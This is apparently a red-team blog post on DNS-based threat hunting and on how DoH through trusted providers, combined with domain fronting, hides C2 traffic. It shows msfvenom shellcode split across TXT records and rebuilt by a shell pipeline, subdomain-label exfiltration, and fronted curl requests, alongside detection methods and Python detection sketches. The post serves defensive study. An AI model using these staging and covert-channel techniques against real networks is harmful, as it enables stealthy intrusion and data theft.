DNS based threat hunting and DoH (DNS over HTTPS)

blog.redteam.pl, 6 years ago

Malicious communication over an encrypted HTTPS channel is nothing new, but DoH (DNS Queries over HTTPS [https://tools.ietf.org/html/rfc8484]) can help a lot in hiding communication with C&C (a.k.a. C2). What is new in this case, and changes a lot, is that well-known and trusted vendors such as Google, CloudFlare etc. are starting to run their own DoH services. This new feature can be utilized by red teamers as well as abused by threat actors such as attackers, malware creators etc.

A few words about the current common approach to detection

One of the general approaches used in threat hunting is detection of malicious communication based on DNS traffic. When an attacker communicates with the C&C using old-style methods such as HTTP(S), it is quite easy to discover such communication if the organisation has anything able to detect such an attack, like a DNS firewall (e.g. OpenDNS FamilyShield [https://signup.opendns.com/familyshield/]) and/or traffic inspection using a SIEM etc., because common detection tools use blacklists of malicious domains. When security researchers use honeypots, perform malware analysis etc., or targeted companies report malicious domains, other organisations can collect these artifacts, such as domains, and use them for detection and/or blocking (e.g. DNS blackhole). As described in The Pyramid of Pain [http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html], this is one of the simplest mechanisms for threat hunting.
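The blacklist matching described above can be sketched in a few lines of Python. This is only a minimal illustration, not how any particular DNS firewall works: the blocklist entries and the queried names are made-up placeholders, and the function name is hypothetical. It checks the queried name and each of its parent domains against the list.

```python
def is_blocklisted(domain, blocklist):
    """Return True if the domain or any of its parent domains is on the blocklist."""
    labels = domain.lower().rstrip(".").split(".")
    # For "a.b.evil.example" check "a.b.evil.example", "b.evil.example", "evil.example", ...
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


# Hypothetical blocklist and DNS log entries, for illustration only.
BLOCKLIST = {"evil.example", "c2.badhost.example"}
queries = ["www.example.com", "cdn.evil.example", "C2.BadHost.example."]

hits = [q for q in queries if is_blocklisted(q, BLOCKLIST)]
print(hits)
```

Matching on parent domains matters because an attacker who controls a domain can create any number of subdomains under it.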

Another common way of malicious communication is to talk to the C&C only over DNS queries; that way malware can communicate with the C&C using, for example, TXT, AXFR or ANY DNS records, but not only these, as it all depends on creativity.

Quoting Cisco Talos Intelligence Group [https://blog.talosintelligence.com/2017/03/dnsmessenger.html]: “Typically this use of DNS is related to the exfiltration of information. Talos recently analyzed an interesting malware sample that made use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker. This is an extremely uncommon and evasive way of administering a RAT.”, but in fact, this is not extremely uncommon [https://attack.mitre.org/techniques/T1071/]. Each idea for using DNS for malicious traffic is a little different, but in general the detection is the same. If any of the desktop computers in your office is making TXT DNS queries, isn’t this suspicious? In which real case does a desktop, not a server, make a TXT query? Such queries are normally made by server services, for example to check SPF [https://support.google.com/a/answer/33786?hl=en], DKIM [https://support.google.com/a/answer/174124?hl=en] and other domain verification, for example the one used by Google [https://support.google.com/a/answer/183895?hl=en] etc.
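As a rough illustration of that rule, the sketch below flags TXT queries coming from workstations. It assumes DNS logs have already been parsed into dictionaries with hypothetical `client`, `qname` and `qtype` keys, and that workstations sit in one known subnet; both are assumptions made for the example, not properties of any specific product.

```python
import ipaddress

# Assumption: desktops live in this subnet, servers live elsewhere.
WORKSTATION_NET = ipaddress.ip_network("192.168.0.0/24")


def suspicious_txt_queries(log_entries, workstation_net=WORKSTATION_NET):
    """Return the log entries in which a workstation asked for a TXT record."""
    return [
        entry for entry in log_entries
        if entry["qtype"].upper() == "TXT"
        and ipaddress.ip_address(entry["client"]) in workstation_net
    ]


# Made-up log entries for illustration.
log = [
    {"client": "192.168.0.109", "qname": "payload.redteam.pl", "qtype": "TXT"},
    {"client": "192.168.0.109", "qname": "example.com", "qtype": "A"},
    {"client": "10.0.0.25", "qname": "example.com", "qtype": "TXT"},  # e.g. a mail server checking SPF
]

for entry in suspicious_txt_queries(log):
    print(entry["client"], entry["qname"])
```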

Sample transfer of shellcode, commands or whatever malicious actor wants to transfer from C&C can look like:

# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python

# size 220

# "\xd9\xf7\xd9\x74\x24\xf4\x5a\xbf\x3e\x85\xd7\x8e\x2b"

# "\xc9\xb1\x31\x31\x7a\x18\x03\x7a\x18\x83\xc2\x3a\x67"

# "\x22\x72\xaa\xe5\xcd\x8b\x2a\x8a\x44\x6e\x1b\x8a\x33"

# "\xfa\x0b\x3a\x37\xae\xa7\xb1\x15\x5b\x3c\xb7\xb1\x6c"

# "\xf5\x72\xe4\x43\x06\x2e\xd4\xc2\x84\x2d\x09\x25\xb5"

# "\xfd\x5c\x24\xf2\xe0\xad\x74\xab\x6f\x03\x69\xd8\x3a"

# "\x98\x02\x92\xab\x98\xf7\x62\xcd\x89\xa9\xf9\x94\x09"

# "\x4b\x2e\xad\x03\x53\x33\x88\xda\xe8\x87\x66\xdd\x38"

# "\xd6\x87\x72\x05\xd7\x75\x8a\x41\xdf\x65\xf9\xbb\x1c"

# "\x1b\xfa\x7f\x5f\xc7\x8f\x9b\xc7\x8c\x28\x40\xf6\x41"

# "\xae\x03\xf4\x2e\xa4\x4c\x18\xb0\x69\xe7\x24\x39\x8c"

# "\x28\xad\x79\xab\xec\xf6\xda\xd2\xb5\x52\x8c\xeb\xa6"

# "\x3d\x71\x4e\xac\xd3\x66\xe3\xef\xb9\x79\x71\x8a\x8f"

# "\x7a\x89\x95\xbf\x12\xb8\x1e\x50\x64\x45\xf5\x15\x9a"

# "\x0f\x54\x3f\x33\xd6\x0c\x02\x5e\xe9\xfa\x40\x67\x6a"

# "\x0f\x38\x9c\x72\x7a\x3d\xd8\x34\x96\x4f\x71\xd1\x98"

# "\xfc\x72\xf0\xfa\x63\xe1\x98\xd2\x06\x81\x3b\x2b"

$ host -t txt payload.redteam.pl

redteam.pl descriptive text "00 d9f7d97424f45abf3e85d78e2b"

redteam.pl descriptive text "01 c9b131317a18037a1883c23a67"

redteam.pl descriptive text "13 7a8995bf12b81e506445f5159a"

redteam.pl descriptive text "14 0f543f33d60c025ee9fa40676a"

redteam.pl descriptive text "15 0f389c727a3dd834964f71d198"

redteam.pl descriptive text "16 fc72f0fa63e198d206813b2b"

redteam.pl descriptive text "06 980292ab98f762cd89a9f99409"

redteam.pl descriptive text "07 4b2ead03533388dae88766dd38"

redteam.pl descriptive text "08 d6877205d7758a41df65f9bb1c"

redteam.pl descriptive text "09 1bfa7f5fc78f9bc78c2840f641"

redteam.pl descriptive text "10 ae03f42ea44c18b069e724398c"

redteam.pl descriptive text "11 28ad79abecf6dad2b5528ceba6"

redteam.pl descriptive text "12 3d714eacd366e3efb979718a8f"

redteam.pl descriptive text "02 2272aae5cd8b2a8a446e1b8a33"

redteam.pl descriptive text "03 fa0b3a37aea7b1155b3cb7b16c"

redteam.pl descriptive text "04 f572e443062ed4c2842d0925b5"

redteam.pl descriptive text "05 fd5c24f2e0ad74ab6f0369d83a"

The numbers at the beginning of each record are used to keep the correct order, as this is a round-robin DNS [https://en.wikipedia.org/wiki/Round-robin_DNS]-like approach and the order will be random for each answer.

$ host -t txt payload.redteam.pl | awk '{print $4,$5}' | sort | awk '{print $2}' | sed -s 's/"//' | sed 's/../\\x\0/g'

\xd9\xf7\xd9\x74\x24\xf4\x5a\xbf\x3e\x85\xd7\x8e\x2b

\xc9\xb1\x31\x31\x7a\x18\x03\x7a\x18\x83\xc2\x3a\x67

\x22\x72\xaa\xe5\xcd\x8b\x2a\x8a\x44\x6e\x1b\x8a\x33

\xfa\x0b\x3a\x37\xae\xa7\xb1\x15\x5b\x3c\xb7\xb1\x6c

\xf5\x72\xe4\x43\x06\x2e\xd4\xc2\x84\x2d\x09\x25\xb5

\xfd\x5c\x24\xf2\xe0\xad\x74\xab\x6f\x03\x69\xd8\x3a

\x98\x02\x92\xab\x98\xf7\x62\xcd\x89\xa9\xf9\x94\x09

\x4b\x2e\xad\x03\x53\x33\x88\xda\xe8\x87\x66\xdd\x38

\xd6\x87\x72\x05\xd7\x75\x8a\x41\xdf\x65\xf9\xbb\x1c

\x1b\xfa\x7f\x5f\xc7\x8f\x9b\xc7\x8c\x28\x40\xf6\x41

\xae\x03\xf4\x2e\xa4\x4c\x18\xb0\x69\xe7\x24\x39\x8c

\x28\xad\x79\xab\xec\xf6\xda\xd2\xb5\x52\x8c\xeb\xa6

\x3d\x71\x4e\xac\xd3\x66\xe3\xef\xb9\x79\x71\x8a\x8f

\x7a\x89\x95\xbf\x12\xb8\x1e\x50\x64\x45\xf5\x15\x9a

\x0f\x54\x3f\x33\xd6\x0c\x02\x5e\xe9\xfa\x40\x67\x6a

\x0f\x38\x9c\x72\x7a\x3d\xd8\x34\x96\x4f\x71\xd1\x98

\xfc\x72\xf0\xfa\x63\xe1\x98\xd2\x06\x81\x3b\x2b
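For readers who prefer to see the ordering step spelled out, here is a minimal Python sketch of what the shell pipeline above does: it pulls the "index hexdata" pairs out of the `host` output, sorts them by index and joins the hex. The function name is hypothetical and the sample input is just the first two records from the listing, deliberately out of order.

```python
import re


def reassemble(host_output):
    """Order 'NN hexdata' TXT chunks by their index and return the joined bytes."""
    chunks = re.findall(r'"(\d+) ([0-9a-fA-F]+)"', host_output)
    ordered = sorted(chunks, key=lambda chunk: int(chunk[0]))
    return bytes.fromhex("".join(data for _, data in ordered))


# Two records from the listing above, in the "wrong" order.
sample = '''
redteam.pl descriptive text "01 c9b131317a18037a1883c23a67"
redteam.pl descriptive text "00 d9f7d97424f45abf3e85d78e2b"
'''

blob = reassemble(sample)
print(len(blob), blob[:4].hex())
```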

Using just a DNS query we were able to transfer shellcode. In the same way a threat actor is able not only to download data but also to send (leak) data, because there is enough space in each DNS query to do that:

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.example.com

To detect this we can measure the entropy of the request, its length, its frequency, the responses and their TTL etc., but this is not the main subject of this article, so we will skip it.
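Without going into the details, the first two measurements are easy to sketch. The example below computes the Shannon entropy and length of the longest label in a queried name; the function names are hypothetical and any alerting threshold would have to be tuned on real traffic, so none is suggested here.

```python
import math
from collections import Counter


def shannon_entropy(text):
    """Shannon entropy of the characters in text, in bits per character."""
    if not text:
        return 0.0
    total = len(text)
    counts = Counter(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def query_features(qname):
    """Length of the name plus length and entropy of its longest label."""
    labels = qname.rstrip(".").split(".")
    longest = max(labels, key=len)
    return {
        "length": len(qname),
        "longest_label": len(longest),
        "entropy": round(shannon_entropy(longest), 2),
    }


print(query_features("www.example.com"))
print(query_features("d9f7d97424f45abf3e85d78e2bc9b131.example.com"))
```

Hex or base32 encoded data in a label tends to be both longer and more evenly distributed than a human-chosen hostname, which is why these two features are commonly looked at together.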

The whole approach depends on the creativity of malicious actors, but to sum up the above, attackers can usually be detected by threat hunting based on simple inspection of DNS traffic: monitoring internal DNS logs and also, if possible, communication to external DNS services, which should not happen in a common organisation environment, as all computers normally use internal DNS servers. If any computers are resolving domains through external DNS services, this should definitely trigger an alert and it should be investigated why it is occurring. Using these techniques we are able to detect, i.a., the initial communication to an HTTPS C&C server, C&C communication done entirely with DNS requests, malware that uses a DGA (Domain Generation Algorithm) etc.
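A check for hosts that bypass the internal resolver could look roughly like the sketch below. It assumes flow records are available as dictionaries with hypothetical `src`, `dst` and `dport` keys and that the set of internal resolvers is known; the addresses are placeholders taken from the examples in this article.

```python
import ipaddress

# Assumption: the organisation's internal DNS resolvers.
INTERNAL_RESOLVERS = {ipaddress.ip_address("192.168.0.1")}


def external_dns_flows(flows, resolvers=INTERNAL_RESOLVERS):
    """Return flows to port 53 that go from a non-resolver host to a non-resolver destination."""
    return [
        flow for flow in flows
        if flow["dport"] == 53
        and ipaddress.ip_address(flow["dst"]) not in resolvers
        # The resolvers themselves legitimately talk to upstream DNS servers.
        and ipaddress.ip_address(flow["src"]) not in resolvers
    ]


# Made-up flow records for illustration.
flows = [
    {"src": "192.168.0.109", "dst": "192.168.0.1", "dport": 53},
    {"src": "192.168.0.109", "dst": "8.8.8.8", "dport": 53},
    {"src": "192.168.0.1", "dst": "8.8.8.8", "dport": 53},
    {"src": "192.168.0.109", "dst": "8.8.8.8", "dport": 443},
]

for flow in external_dns_flows(flows):
    print(flow["src"], "->", flow["dst"])
```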

Also keep in mind that attackers can communicate with an HTTP server using just an IP address, so without domains and DNS queries, but usually they don’t, because it is a lot easier to take down a service that is referred to directly by a hardcoded IP than to take down a domain used for malicious behaviour. Normally domains are hardcoded in the malware, or a DGA is in use, as mentioned before. For direct IP communication we can do detection based on GeoIP (country based), IP reputation, malicious IP lists (same as with domains), port and protocol inspection etc. Normally this is also used as another layer of threat hunting techniques, of which DNS based detection is one. These are the fundamentals of threat hunting, which are described in The Pyramid of Pain mentioned above.

DNS over HTTPS (DoH) as a channel for C2 communication

Since DoH is in use and, which is the main focus of this article, there are DoH services offered by trusted vendors, it can be used as a new style for old ideas. The main problem is that DoH services such as those offered by Google or CloudFlare are categorized and rated as trusted hosts and will not trigger alerts in detection systems. Traffic to such vendors is common in almost every organisation, and that makes detection a lot harder.

DoH uses an approach designed for user privacy, because everyone in your local network, ISPs etc. can see DNS traffic. This is also a problem for Tor users etc. In short, no one knows what you watch on youtube.com, but everyone knows that you visit youtube.com, because DNS queries are not encrypted the way HTTPS traffic is. In fact it is not only DNS queries that leak the VirtualHost (Apache [https://httpd.apache.org/docs/2.4/vhosts/index.html]) / Server Block (nginx [https://www.nginx.com/resources/wiki/start/topics/examples/server_blocks/]) name but also SSL/TLS certificates; this is described below.

It is worth mentioning that DoT (DNS over TLS) services also exist, but we will not focus on them, because the main goal of this article is threat hunting and red teaming. DoT can be easily detected by simply monitoring traffic to port 853/tcp. If no one in your organisation uses DoT (it is quite a new and uncommon standard) and a few hosts suddenly start communicating with it, that is easy to detect. We are not discussing which is better in terms of privacy, DoT or DoH, which is another reason we will not focus on DoT. Not to mention that such ports will usually be blocked on the organisation firewall, which we can’t say about 443/tcp (HTTPS).

DoH is hard to detect because the whole communication is done over HTTPS, which is encrypted and considered common network traffic; there is nothing special that could easily trigger an alert about malicious communication:

$ curl 'https://dns.google.com/resolve?name=example.com&type=TXT'

{"Status": 0,"TC": false,"RD": true,"RA": true,"AD": false,"CD": false,"Question":[ {"name": "example.com.","type": 16}],"Answer":[ {"name": "example.com.","type": 16,"TTL": 18585,"data": "\"v=spf1 -all\""}]}

Traffic for that request looks like this:

192.168.0.109 192.168.0.1 DNS 74 Standard query 0xfa6c A dns.google.com

192.168.0.109 192.168.0.1 DNS 74 Standard query 0xb49b AAAA dns.google.com

192.168.0.1 192.168.0.109 DNS 338 Standard query response 0xfa6c A dns.google.com A 216.58.215.110 NS ns2.google.com NS ns4.google.com NS ns3.google.com NS ns1.google.com A 216.239.32.10 AAAA 2001:4860:4802:32::a A 216.239.34.10 AAAA 2001:4860:4802:34::a A 216.239.36.10 AAAA 2001:4860:4802:36::a A 216.239.38.10 AAAA 2001:4860:4802:38::a

192.168.0.1 192.168.0.109 DNS 350 Standard query response 0xb49b AAAA dns.google.com AAAA 2a00:1450:401b:803::200e NS ns3.google.com NS ns4.google.com NS ns1.google.com NS ns2.google.com A 216.239.32.10 AAAA 2001:4860:4802:32::a A 216.239.34.10 AAAA 2001:4860:4802:34::a A 216.239.36.10 AAAA 2001:4860:4802:36::a A 216.239.38.10 AAAA 2001:4860:4802:38::a

OK, there is communication to a Google ASN, but we can detect the DNS query for the dns.google.com record. Monitoring for DoH endpoints is a good approach, but the problem is that an attacker can establish communication without this DNS query:

$ curl -k -H 'Host: dns.google.com' 'https://216.58.215.78/resolve?name=example.com&type=TXT'

{"Status": 0,"TC": false,"RD": true,"RA": true,"AD": true,"CD": false,"Question":[ {"name": "example.com.","type": 16}],"Answer":[ {"name": "example.com.","type": 16,"TTL": 5477,"data": "\"v=spf1 -all\""}]}

OK, better, but this can still be detected, for example by using a Wireshark display filter such as:

tls.handshake.type == 1 && !tls.handshake.extension.type == 0

This can also be used for detection as a column, tls.handshake.extensions_server_name:

In the case of direct communication with an IP address, using just the HTTP “Host” header to pick the VirtualHost/Server Block, the “Server Name” column will not contain anything, and that can alert a threat hunter, as such communication is not common.
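The same check can be applied outside Wireshark once the Client Hello records have been exported. The sketch below assumes they were exported into dictionaries with a hypothetical `server_name` key (for instance from the tls.handshake.extensions_server_name field); the export step itself is not shown and the records are made up.

```python
def hellos_without_sni(client_hellos):
    """Return Client Hello records whose server_name is missing or empty."""
    return [
        hello for hello in client_hellos
        if not (hello.get("server_name") or "").strip()
    ]


# Made-up Client Hello records for illustration.
hellos = [
    {"src": "192.168.0.109", "dst": "216.58.215.110", "server_name": "dns.google.com"},
    {"src": "192.168.0.109", "dst": "216.58.215.78", "server_name": ""},
    {"src": "192.168.0.109", "dst": "172.217.16.46"},  # field absent in the export
]

for hello in hellos_without_sni(hellos):
    print(hello["src"], "->", hello["dst"])
```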

Some time ago the Deloitte Greece ethical hacking team presented a method which they named, in short, the "LAME" technique [https://dotelite.gr/the-lame-technique/]. Quoting the authors: “It is possible to get a trusted SSL Certificate for a public DNS name resolving to internal IP address and use it for establishing encrypted communication channels [with C&C] within internal networks”. This is a good example of how effective simple DNS based threat hunting can be. When a domain resolves to a LAN or non-routable IP address, it should certainly trigger an alert if any of your organisation's computers query the DNS server for such a domain.

Historically this was a method used by bot masters to temporarily deactivate botnets which, for example, were IRC based and whose malware binary had a hardcoded domain. Each bot tried to reconnect to the IRC server at some interval, but when the domain started to point at localhost (IN A 127.0.0.1), each bot switched to a standby state: it wasn’t able to connect, as there was no local IRC service, so it kept trying to connect and querying DNS for the C&C domain after the TTL had passed. That way it was only possible to take down the botnet by controlling the domain, because without this it was not even possible to see how large the botnet was, as the zombies (bots) were not connecting to the C&C but tried connecting to localhost for as long as the domain pointed there; a short TTL (in DNS this is a time in seconds) was also in use. If a botmaster needed access to the botnet, it was just a matter of starting the C&C and then changing the DNS records; each zombie reconnected as soon as the requested domain pointed to the C&C IP address again.

Getting back to the "LAME" technique, the communication is indeed encrypted but, as mentioned above, we can see the certificate details, which are not encrypted in the initial SSL/TLS communication (Client Hello), and that includes i.a. domains (as above, the tls.handshake.extensions_server_name display filter in Wireshark). Now we see an external domain used in communication between two (or more) hosts in the LAN, preceded by a DNS query that resolves to a LAN IP; isn’t this suspicious? Yes, of course it is, and it is one of the simplest DNS based detection rules. In conclusion the authors of this method write: “This can be used as a covert lateral movement technique, which bypasses intrusion detection / monitoring tools.”, but in fact it makes detection even more effective, because when companies perform threat hunting, DNS based detection is usually in use as the simplest threat hunting method, one that doesn’t require any large investment. Not to mention that using this method can in fact trigger an IDS alert, and most likely there is less detection risk when we do not use it at all than when we make things harder… simple solutions work best. Whether we run a red teaming engagement or malware actors perform attacks, less complicated things, less uncommon traffic etc. are harder to detect, even when the communication is plaintext. Let’s remember that in a LAN sysadmins normally communicate with servers by IP or by using internal TLD domains (like server.redteam; there is no TLD “redteam”, but we can have any TLD we want in our internal network and it will only work for computers that use our internal DNS server). How often do sysadmins use external domains (which do not belong to the organisation) for internal HTTPS communication? Never? Personally I have never encountered such an approach.
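The rule described above, alerting when an external name resolves to a LAN or otherwise non-routable address, can be sketched with Python's standard ipaddress module. The input format (name and address pairs), the function name and the internal suffix list are assumptions made for this example; `.redteam` is only the illustrative internal TLD mentioned above.

```python
import ipaddress

# Assumption: names under these suffixes are internal and may resolve to LAN IPs.
INTERNAL_SUFFIXES = (".redteam",)


def suspicious_answers(answers, internal_suffixes=INTERNAL_SUFFIXES):
    """Return (name, address) pairs where a non-internal name points at a non-public IP."""
    flagged = []
    for name, address in answers:
        host = name.lower().rstrip(".")
        if host.endswith(internal_suffixes):
            continue  # internal names are expected to resolve to LAN addresses
        ip = ipaddress.ip_address(address)
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            flagged.append((name, address))
    return flagged


# Made-up DNS answers for illustration.
answers = [
    ("server.redteam", "192.168.0.10"),
    ("lame.example.com", "192.168.0.50"),
    ("redteam.pl", "104.248.133.95"),
    ("irc.example.net", "127.0.0.1"),
]

for name, address in suspicious_answers(answers):
    print(name, address)
```

The loopback case covers the historical "parked botnet" trick as well, since a C&C domain pointing at 127.0.0.1 is flagged by the same rule.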

Bypass DoH detection with Domain Fronting

The problem is that a method called Domain Fronting [https://en.wikipedia.org/wiki/Domain_fronting] also exists, which can be used, i.a., to bypass Internet censorship, but also in malicious communication:

$ curl -H 'Host: dns.google.com' 'https://google.com/resolve?name=example.com&type=TXT'

In Wireshark such traffic will look like:

This can look like normal Internet traffic, as if someone were querying Google with a web browser. It may look normal, but it does not have to if we focus on the details of what real communication from a web browser looks like. We can count handshakes, sizes, time between requests, sequences with other hosts like consent.google.com, www.gstatic.com, adservice.google.com etc. Please note that a malicious actor can also do a more advanced simulation of normal user behaviour. This can become a never-ending story, as threat actors can use simulation of regular user behaviour to transfer even more data, since domain fronting can most likely be used with all possible Google hosts:

$ host -t A google.com

google.com has address 172.217.16.46

$ host -t A dns.google.com

dns.google.com has address 216.58.215.78

$ curl -H 'Host: dns.google.com' 'https://google.com/resolve?name=example.com&type=TXT'

$ curl -k -H 'Host: dns.google.com' 'https://172.217.16.46/resolve?name=example.com&type=TXT'

$ curl -k -H 'Host: dns.google.com' 'https://216.58.215.78/resolve?name=example.com&type=TXT'

$ host -t A adservice.google.com

adservice.google.com is an alias for pagead46.l.doubleclick.net.

pagead46.l.doubleclick.net has address 172.217.20.194

$ curl -k -H 'Host: dns.google.com' 'https://172.217.20.194/resolve?name=example.com&type=TXT'

$ host -t A google.pl

google.pl has address 172.217.16.35

$ curl -k -H 'Host: dns.google.com' 'https://172.217.16.35/resolve?name=example.com&type=TXT'

$ host -t A blogger.com

blogger.com has address 172.217.20.201

$ curl -k -H 'Host: dns.google.com' 'https://172.217.20.201/resolve?name=example.com&type=TXT'

$ curl -H 'Host: dns.google.com' 'https://blogger.com/resolve?name=redteam.pl&type=A'

{"Status": 0,"TC": false,"RD": true,"RA": true,"AD": false,"CD": false,"Question":[ {"name": "redteam.pl.","type": 1}],"Answer":[ {"name": "redteam.pl.","type": 1,"TTL": 8615,"data": "104.248.133.95"}]}
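The JSON replies shown in the curl examples are trivial to consume programmatically, which is part of what makes this channel convenient. As a minimal sketch (the function name and the small type table are my own, not part of any client library), the last reply above can be decoded like this:

```python
import json

# A small subset of DNS record type numbers, enough for the examples here.
RR_TYPES = {1: "A", 16: "TXT", 28: "AAAA"}


def parse_answers(body):
    """Return (name, type, ttl, data) tuples from a JSON DoH response body."""
    reply = json.loads(body)
    if reply.get("Status") != 0:  # 0 means NOERROR
        return []
    return [
        (a["name"], RR_TYPES.get(a["type"], str(a["type"])), a["TTL"], a["data"])
        for a in reply.get("Answer", [])
    ]


# Response body copied from the last curl example above.
body = '{"Status": 0,"TC": false,"RD": true,"RA": true,"AD": false,"CD": false,"Question":[ {"name": "redteam.pl.","type": 1}],"Answer":[ {"name": "redteam.pl.","type": 1,"TTL": 8615,"data": "104.248.133.95"}]}'

print(parse_answers(body))
```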

Another problem with distinguishing normal traffic from malicious traffic is that, for example, Firefox allows users to use DoH [https://wiki.mozilla.org/Trusted_Recursive_Resolver], which by default communicates with mozilla.cloudflare-dns.com. At the moment there are a few more DoH services [https://github.com/curl/curl/wiki/DNS-over-HTTPS] and in the future we should have a lot more available.

Summary

On the one hand it is better for user privacy when solutions like DoH are in place; on the other hand it is harder to detect leaks with, i.a., DLP (Data Leak Prevention) tools. This also shows that products such as DNS firewalls are not enough for organisations to defend against hackers. Threat actors are still able to use hardcoded domains or a DGA in malware, but with DoH this will not be detected by today’s DNS firewall solutions. Currently, when an attacker uses his own DNS server and the traffic is not encrypted, we can simply detect it by additional inspection of DNS related network traffic, not only the DNS queries/logs from our own service. With DoH we will see HTTPS communication to, i.a., google.com, without even knowing that it is a DNS query. This is not only a way to send hidden DNS queries but also a great way to leak data outside the organisation network without being detected. The need arises to perform real threat hunting, not just to use products advertised with buzzwords. Detection needs to be based on knowledge from the top of The Pyramid of Pain: Tactics, Techniques and Procedures (TTPs). Threat hunters need to think like highly skilled threat actors, not only detect well-known and common techniques which are normally used only by low-skilled attackers, such as script kiddies.

Threat hunters need to have similar skills to red teamers, and vice versa, if red teamers want to keep up and perform simulations of attacks that can go undetected. A good example of how NOT to simulate attacks is the "LAME" technique mentioned above: it sounds great, but in fact it makes detection easier compared to a case where no such method is in use and attackers don’t encrypt communication in the internal network. Most organisations don’t store LAN traffic, but even if they do, this is about not being detected (a successful attack) versus leaving more forensic artifacts, and we are talking primarily about post-exploitation and lateral movement artifacts, which most likely will not be connected to any external resources. Which approach would you choose as an attacker: leave more forensic evidence, or be able to perform a successful attack without detection during the ongoing engagement? Using DoH with domain fronting creates a real problem for detection in a common environment, simply because it makes it possible to establish malicious communication using trusted vendors as a proxy. We can check the time (outside of working hours), compare the time between requests etc., but there is no obvious alert just for DoH without encountering many false positives. Anyway, threat hunting is not about detecting all the things. It should trigger alerts which are almost never false positives; it should detect some stages of attacks but doesn’t need to detect all of them, i.a. because of computing power and because more false positives can lower our guard and end in overlooking a real attack.